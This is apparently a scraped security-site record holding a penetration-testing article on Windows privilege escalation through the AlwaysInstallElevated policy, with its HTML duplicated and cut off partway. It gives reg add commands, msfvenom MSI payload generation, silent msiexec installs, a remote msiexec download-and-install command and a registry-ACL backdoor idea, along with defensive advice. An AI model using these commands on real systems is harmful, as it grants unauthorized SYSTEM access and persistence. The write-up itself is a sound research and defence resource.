[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnlBQBoBeZ_jo5AF_hHH1OEqHHRyVrSQjVYeobQFDOvg":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},314,"Can AlwaysInstallElevated be exploited remotely via msiexec, and what are the limitations?","Msiexec supports remote download and execution using a URL (e.g., `msiexec \u002Fq \u002Fi https:\u002F\u002Fexample.com\u002Fpayload.msi`), but attempting this with an untrusted MSI file will fail because the installer treats the source as untrusted. The file must be signed with a trusted certificate to perform a remote exploitation using AlwaysInstallElevated. This limitation is discussed in the extended approaches section of [Test Analysis of Privilege Escalation Using AlwaysInstallElevated](\u002Fnews\u002Ftest-analysis-of-privilege-escalation-using-alwaysinstallelevated).","\u003Cp>Msiexec supports remote download and execution using a URL (e.g., `msiexec \u002Fq \u002Fi https:\u002F\u002Fexample.com\u002Fpayload.msi`), but attempting this with an untrusted MSI file will fail because the installer treats the source as untrusted. The file must be signed with a trusted certificate to perform a remote exploitation using AlwaysInstallElevated. This limitation is discussed in the extended approaches section of [Test Analysis of Privilege Escalation Using AlwaysInstallElevated](\u002Fnews\u002Ftest-analysis-of-privilege-escalation-using-alwaysinstallelevated).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Ftest-analysis-of-privilege-escalation-using-alwaysinstallelevated\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","can-alwaysinstallelevated-be-exploited-remotely-via-msiexec-and-what-are-the-lim-1777484304698","remote execution, msiexec, certificate, trusted source, AlwaysInstallElevated",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},80,"Test Analysis of Privilege Escalation Using AlwaysInstallElevated","test-analysis-of-privilege-escalation-using-alwaysinstallelevated","Explore AlwaysInstallElevated privilege escalation testing, issues with Metasploit, and solutions for effective exploitation in Windows environments.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Privilege escalation using AlwaysInstallElevated is a technique publicly disclosed in 2017, with exploitation methods provided by both Metasploit and PowerUp\u003C\u002Fp>\u003Cp>During my research, I discovered some shortcomings in Metasploit's exploitation method and encountered situations different from those described in other public articles\u003C\u002Fp>\u003Cp>Therefore, I conducted further research. This article will introduce the problems I encountered and their solutions\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Conventional exploitation methods\u003C\u002Fli>\u003Cli>Problems encountered during my testing\u003C\u002Fli>\u003Cli>Solutions\u003C\u002Fli>\u003Cli>Extended exploitation approaches\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Conventional Exploitation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>AlwaysInstallElevated is a Group Policy configuration that, if enabled, allows standard users to run installation files (msi) with SYSTEM privileges.\u003C\u002Fp>\u003Ch3>Enabling method:\u003C\u002Fh3>\u003Cp>The following two Group Policies need to be modified:\u003C\u002Fp>\u003Cul>\u003Cli>Computer Configuration\\Administrative Templates\\Windows Components\\Windows Installer\u003C\u002Fli>\u003Cli>User Configuration\\Administrative Templates\\Windows Components\\Windows Installer\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Set to Enabled, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018752623_0_0dc13f6457.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above two Group Policies cannot be modified via secedit.exe from the command line.\u003C\u002Fp>\u003Ch3>Command line enabling method:\u003C\u002Fh3>\u003Cp>Create the following two registry entries:\u003C\u002Fp>\u003Cul>\u003Cli>HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer,AlwaysInstallElevated,1\u003C\u002Fli>\u003Cli>HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer,AlwaysInstallElevated,1\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The cmd command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation method:\u003C\u002Fh3>\u003Cp>After enabling AlwaysInstallElevated, you can invoke msiexec via the command line to install an MSI file. The MSI file contains the payload to be executed, and the payload will run with System privileges.\u003C\u002Fp>\u003Cp>The command to invoke msiexec is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi test.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The \u002Fi parameter indicates an installation operation.\u003C\u002Fp>\u003Cp>The \u002Fq parameter is used to hide the installation interface.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After execution, an MSI log file will be generated under %TEMP%.\u003C\u002Fp>\u003Cp>For more information about msiexec, refer to the previous article 'msiexec in Penetration Testing'.\u003C\u002Fp>\u003Ch2>0x03 Open-source method testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Enable AlwaysInstallElevated in the test environment with the following commands:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>1.PowerUp\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FPrivesc\u002FPowerUp.ps1\u003C\u002Fp>\u003Cp>(1) Test if AlwaysInstallElevated is enabled\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerUp.ps1\u003Cbr>Get-RegistryAlwaysInstallElevated\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Returns True if enabled\u003C\u002Fp>\u003Cp>(2) Export msi file\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerUp.ps1\u003Cbr>Write-UserAddMSI\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generates UserAdd.msi in the current directory\u003C\u002Fp>\u003Cp>(3) Execute via command line (with current user privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi UserAdd.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Pops up a dialog for adding users, which can be used to add users, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018765409_1_163abf2e99.jpeg\">\u003C\u002Fp>\u003Cp>At this point, check that the dialog's permissions are System, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018782972_2_b33d9294ed.jpeg\">\u003C\u002Fp>\u003Cp>Privilege escalation successful\u003C\u002Fp>\u003Ch3>2. Metasploit\u003C\u002Fh3>\u003Cp>Generate an msi file that launches the calculator, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fexec CMD=calc.exe -f msi &gt;calc.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the msi file via command line (with current user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi calc.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The launched calculator has Medium privileges, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018791989_3_cd1dbbe63d.jpeg\">\u003C\u002Fp>\u003Cp>This differs from the PowerUp result\u003C\u002Fp>\u003Cp>Switch to an msi file with a different payload, for example adding a user:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fadduser USER=test PASS=12356QW!@ -f msi &gt;adduser.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For example, executing a cmd command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fexec CMD='whoami &gt;1.txt' -f msi &gt; cmd.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>All attempts fail due to insufficient privileges (Medium)\u003C\u002Fp>\u003Cp>This is different from the situation described in other public articles.\u003C\u002Fp>\u003Cp>Personal speculation:\u003C\u002Fp>\u003Cp>The MSI file generated by Metasploit does not require elevation of privileges when running, which led to this issue.\u003C\u002Fp>\u003Ch2>0x04 Solution\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Here, you can refer to the PowerUp method to generate an MSI file.\u003C\u002Fp>\u003Cp>Directly execute the UserAdd.msi generated by PowerUp, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018803046_4_d07ead81e6.jpeg\">\u003C\u002Fp>\u003Cp>It indicates that the MSI file is generated by MSI Wrapper.\u003C\u002Fp>\u003Cp>Next, we will try to use MSI Wrapper to generate a usable payload.\u003C\u002Fp>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.exemsi.com\u002Fdownload\u002F\u003C\u002Fp>\u003Cp>The generation process is as follows:\u003C\u002Fp>\u003Ch4>1. Set the payload to execute ProcessHacker.\u003C\u002Fh4>\u003Cp>Configuration is as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018808643_5_70a16f3656.jpeg\">\u003C\u002Fp>\u003Ch4>2. Runtime requires elevated privileges\u003C\u002Fh4>\u003Cp>Configuration as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018815329_6_1cd1ef68bf.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Both Per User and Per Machine can be selected under MSI installation context\u003C\u002Fp>\u003Cp>Other configurations follow default settings, the generated msi file has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Test again, execute the msi file via command line (current user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi RunProcessHacker.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>ProcessHacker executes with System privileges, exploitation successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018821826_7_9deab92153.jpeg\">\u003C\u002Fp>\u003Cp>Based on the above tests, we can conclude:\u003C\u002Fp>\u003Cp>The msi file generated by Metasploit does not require elevated privileges at runtime, so it cannot exploit AlwaysInstallElevated for privilege escalation\u003C\u002Fp>\u003Cp>We can use MSI Wrapper to generate an exploitable msi file\u003C\u002Fp>\u003Ch2>0x05 Extended Exploitation Approaches\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Typically, first check the registry entries. If conditions are met (two registry entries exist), privilege escalation can be achieved using AlwaysInstallElevated.\u003C\u002Fp>\u003Ch3>Extended Approach 1:\u003C\u002Fh3>\u003Cp>If you have obtained Backup service user privileges, after running whoami \u002Fpriv, you may find the following privileges present:\u003C\u002Fp>\u003Cul>\u003Cli>SeRestorePrivilege\u003C\u002Fli>\u003Cli>SeTakeOwnershipPrivilege\u003C\u002Fli>\u003C\u002Ful>\u003Cp>At this point, you can perform write operations on the registry, create the corresponding registry entries, and then leverage AlwaysInstallElevated for privilege escalation.\u003C\u002Fp>\u003Cp>For writing to the registry using SeRestorePrivilege and SeTakeOwnershipPrivilege, refer to the previous article: 'Penetration Techniques - Exploitation of Nine Windows Privileges'.\u003C\u002Fp>\u003Ch3>Extended Approach 2:\u003C\u002Fh3>\u003Cp>If you have already obtained SYSTEM privileges, you can create a privilege escalation backdoor.\u003C\u002Fp>\u003Cp>Add ACLs to the following registry entries to allow write access for Everyone:\u003C\u002Fp>\u003Cul>\u003Cli>HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\u003C\u002Fli>\u003Cli>HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For methods on adding ACLs to registry entries, refer to the previous article: 'Penetration Techniques - Access Control List in Windows'.\u003C\u002Fp>\u003Ch3>Expansion Idea 3:\u003C\u002Fh3>\u003Cp>msiexec supports remote download and execution, so can it be leveraged with AlwaysInstallElevated for privilege escalation?\u003C\u002Fp>\u003Cp>Test command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002FRunProcessHacker.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execution failed\u003C\u002Fp>\u003Cp>Next, investigate the cause, display the installation process, test command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fi https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002FRunProcessHacker.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Prompt indicates the source is untrusted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018826703_8_0f6d7db0df.jpeg\">\u003C\u002Fp>\u003Cp>Conclusion:\u003C\u002Fp>\u003Cp>MSI files require a trusted certificate for remote exploitation of AlwaysInstallElevated privilege escalation\u003C\u002Fp>\u003Ch2>0x06 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If there is no specific requirement, disable AlwaysInstallElevated\u003C\u002Fp>\u003Cp>Monitor registry keys:\u003C\u002Fp>\u003Cul>\u003Cli>HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\u003C\u002Fli>\u003Cli>HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the privilege escalation method using AlwaysInstallElevated, identifies the reasons for the failure of exploiting MSI files generated by Metasploit, and finally explains how to generate exploitable MSI files using MSI Wrapper\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Privilege escalation using AlwaysInstallElevated is a technique publicly disclosed in 2017, with exploitation methods provided by both Metasploit and PowerUp\u003C\u002Fp>\u003Cp>During my research, I discovered some shortcomings in Metasploit's exploitation method and encountered situations different from those described in other public articles\u003C\u002Fp>\u003Cp>Therefore, I conducted further research. This article will introduce the problems I encountered and their solutions\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Conventional exploitation methods\u003C\u002Fli>\u003Cli>Problems encountered during my testing\u003C\u002Fli>\u003Cli>Solutions\u003C\u002Fli>\u003Cli>Extended exploitation approaches\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Conventional Exploitation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>AlwaysInstallElevated is a Group Policy configuration that, if enabled, allows standard users to run installation files (msi) with SYSTEM privileges.\u003C\u002Fp>\u003Ch3>Enabling method:\u003C\u002Fh3>\u003Cp>The following two Group Policies need to be modified:\u003C\u002Fp>\u003Cul>\u003Cli>Computer Configuration\\Administrative Templates\\Windows Components\\Windows Installer\u003C\u002Fli>\u003Cli>User Configuration\\Administrative Templates\\Windows Components\\Windows Installer\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Set to Enabled, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018752623_0_0dc13f6457-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above two Group Policies cannot be modified via secedit.exe from the command line.\u003C\u002Fp>\u003Ch3>Command line enabling method:\u003C\u002Fh3>\u003Cp>Create the following two registry entries:\u003C\u002Fp>\u003Cul>\u003Cli>HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer,AlwaysInstallElevated,1\u003C\u002Fli>\u003Cli>HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer,AlwaysInstallElevated,1\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The cmd command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation method:\u003C\u002Fh3>\u003Cp>After enabling AlwaysInstallElevated, you can invoke msiexec via the command line to install an MSI file. The MSI file contains the payload to be executed, and the payload will run with System privileges.\u003C\u002Fp>\u003Cp>The command to invoke msiexec is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi test.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The \u002Fi parameter indicates an installation operation.\u003C\u002Fp>\u003Cp>The \u002Fq parameter is used to hide the installation interface.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After execution, an MSI log file will be generated under %TEMP%.\u003C\u002Fp>\u003Cp>For more information about msiexec, refer to the previous article 'msiexec in Penetration Testing'.\u003C\u002Fp>\u003Ch2>0x03 Open-source method testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Enable AlwaysInstallElevated in the test environment with the following commands:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>1.PowerUp\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FPrivesc\u002FPowerUp.ps1\u003C\u002Fp>\u003Cp>(1) Test if AlwaysInstallElevated is enabled\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerUp.ps1\u003Cbr>Get-RegistryAlwaysInstallElevated\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Returns True if enabled\u003C\u002Fp>\u003Cp>(2) Export msi file\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerUp.ps1\u003Cbr>Write-UserAddMSI\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generates UserAdd.msi in the current directory\u003C\u002Fp>\u003Cp>(3) Execute via command line (with current user privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi UserAdd.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Pops up a dialog for adding users, which can be used to add users, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018765409_1_163abf2e99-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, check that the dialog's permissions are System, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018782972_2_b33d9294ed-1.jpeg\">\u003C\u002Fp>\u003Cp>Privilege escalation successful\u003C\u002Fp>\u003Ch3>2. Metasploit\u003C\u002Fh3>\u003Cp>Generate an msi file that launches the calculator, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fexec CMD=calc.exe -f msi &gt;calc.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the msi file via command line (with current user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi calc.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The launched calculator has Medium privileges, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018791989_3_cd1dbbe63d-1.jpeg\">\u003C\u002Fp>\u003Cp>This differs from the PowerUp result\u003C\u002Fp>\u003Cp>Switch to an msi file with a different payload, for example adding a user:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fadduser USER=test PASS=12356QW!@ -f msi &gt;adduser.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For example, executing a cmd command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fexec CMD='whoami &gt;1.txt' -f msi &gt; cmd.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>All attempts fail due to insufficient privileges (Medium)\u003C\u002Fp>\u003Cp>This is different from the situation described in other public articles.\u003C\u002Fp>\u003Cp>Personal speculation:\u003C\u002Fp>\u003Cp>The MSI file generated by Metasploit does not require elevation of privileges when running, which led to this issue.\u003C\u002Fp>\u003Ch2>0x04 Solution\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Here, you can refer to the PowerUp method to generate an MSI file.\u003C\u002Fp>\u003Cp>Directly execute the UserAdd.msi generated by PowerUp, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018803046_4_d07ead81e6-1.jpeg\">\u003C\u002Fp>\u003Cp>It indicates that the MSI file is generated by MSI Wrapper.\u003C\u002Fp>\u003Cp>Next, we will try to use MSI Wrapper to generate a usable payload.\u003C\u002Fp>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.exemsi.com\u002Fdownload\u002F\u003C\u002Fp>\u003Cp>The generation process is as follows:\u003C\u002Fp>\u003Ch4>1. Set the payload to execute ProcessHacker.\u003C\u002Fh4>\u003Cp>Configuration is as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018808643_5_70a16f3656-1.jpeg\">\u003C\u002Fp>\u003Ch4>2. Runtime requires elevated privileges\u003C\u002Fh4>\u003Cp>Configuration as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018815329_6_1cd1ef68bf-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Both Per User and Per Machine can be selected under MSI installation context\u003C\u002Fp>\u003Cp>Other configurations follow default settings, the generated msi file has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Test again, execute the msi file via command line (current user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi RunProcessHacker.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>ProcessHacker executes with System privileges, exploitation successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018821826_7_9deab92153-1.jpeg\">\u003C\u002Fp>\u003Cp>Based on the above tests, we can conclude:\u003C\u002Fp>\u003Cp>The msi file generated by Metasploit does not require elevated privileges at runtime, so it cannot exploit AlwaysInstallElevated for privilege escalation\u003C\u002Fp>\u003Cp>We can use MSI Wrapper to generate an exploitable msi file\u003C\u002Fp>\u003Ch2>0x05 Extended Exploitation Approaches\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Typically, first check the registry entries. If conditions are met (two registry entries exist), privilege escalation can be achieved using AlwaysInstallElevated.\u003C\u002Fp>\u003Ch3>Extended Approach 1:\u003C\u002Fh3>\u003Cp>If you have obtained Backup service user privileges, after running whoami \u002Fpriv, you may find the following privileges present:\u003C\u002Fp>\u003Cul>\u003Cli>SeRestorePrivilege\u003C\u002Fli>\u003Cli>SeTakeOwnershipPrivilege\u003C\u002Fli>\u003C\u002Ful>\u003Cp>At this point, you can perform write operations on the registry, create the corresponding registry entries, and then leverage AlwaysInstallElevated for privilege escalation.\u003C\u002Fp>\u003Cp>For writing to the registry using SeRestorePrivilege and SeTakeOwnershipPrivilege, refer to the previous article: 'Penetration Techniques - Exploitation of Nine Windows Privileges'.\u003C\u002Fp>\u003Ch3>Extended Approach 2:\u003C\u002Fh3>\u003Cp>If you have already obtained SYSTEM privileges, you can create a privilege escalation backdoor.\u003C\u002Fp>\u003Cp>Add ACLs to the following registry entries to allow write access for 